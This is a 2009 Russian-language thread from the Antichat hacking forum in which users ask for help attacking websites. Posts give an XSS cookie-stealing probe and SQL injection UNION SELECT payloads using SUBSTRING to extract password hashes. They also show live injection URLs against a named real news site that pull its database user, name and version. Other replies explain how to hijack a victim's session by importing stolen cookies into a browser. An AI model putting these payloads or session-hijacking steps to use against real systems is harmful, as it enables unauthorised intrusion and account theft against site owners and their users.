Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.03.2009, 10:20
|
|
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175
Репутация:
0
|
|
Вопрос: Если XSS был найден посредством подставления вот этого скрипта: "><script>alert(document.cookie)</script>
то дальнейшие мои действия для изъятия куки у жертвы такиеже, как и в случае еслибы я уязвимость нашол вот этим скриптом: "><script>alert(XSS)</script> ??? |
|
|
11.03.2009, 10:42
|
|
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994
Репутация:
104
|
|
Да.Такие-же действия.
|
|
|
|
11.03.2009, 12:18
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Gorev
Не вполне понял вопрос.
Если скрипт обрезает выводимые данные, допустим до 15 символов, то , как тут уже сказали, SUBSTRING. Выглядеть это будет примерно так(для хеша 32):
1-е 15 символов
union select SUBSTRING(passwd, 0, 15) from user
c 15 по 30
SUBSTRING(passwd, 15, 30)
и остальные 2
SUBSTRING(passwd, 30, 32)
========================
Иногда встречается "наложение" вывода, ну например сдесь:
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,User(),Database(),Ve rsion()),2,3,4,5,6,7,8,9/*
Вот так нам не видно юзера
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,0x6C6F6C6F6C6F,User( ),Database(),Version()),2,3,4,5,6,7,8,9/*
А вот так видно всё
========================
Если на вопрос не ответил, поподробнее опиши проблему, что выводится, что не выводится, при каких условиях, и чем тебя SUBSTRING не устраивает
|
|
|
|
11.03.2009, 14:41
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от попугай
token - параметр в адресной строке. Например так - http://localhost/phpmyadmin/index.php?db=mysql&token=206136e5c98e1cd2fa26fbd10 4ebc700
Ну,эт понятно... А почему не работает уязвимость в моей бд,непонятно.Вроде всё правильно делаю.
|
|
|
|
11.03.2009, 15:15
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Велемир
Ну,эт понятно... А почему не работает уязвимость в моей бд,непонятно.Вроде всё правильно делаю.
а ты в phpmyadminе залогинен?
|
|
|
|
11.03.2009, 16:07
|
|
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме:
57669
Репутация:
10
|
|
Привет всем  Ребят подскажите вот что:
Есть купи с другого компа, как их использовать? |
|
|
|
11.03.2009, 16:12
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
В браузере вставляешь вместо своих куков на даном сайте и заходиш на него с сесией того, у кого ты их умыкнул...
|
|
|
|
11.03.2009, 16:52
|
|
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме:
57669
Репутация:
10
|
|
а куда их вставлять? в строку броузера?
|
|
|
|
11.03.2009, 16:57
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
не встроку а в место где куки опера -->tools-->preferences-->advanced-->coockies-->manage coockies
|
|
|
|
11.03.2009, 16:57
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Неет!
В опере:
Инструменты->настройки->дополнительно->cookie->управление cookie
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
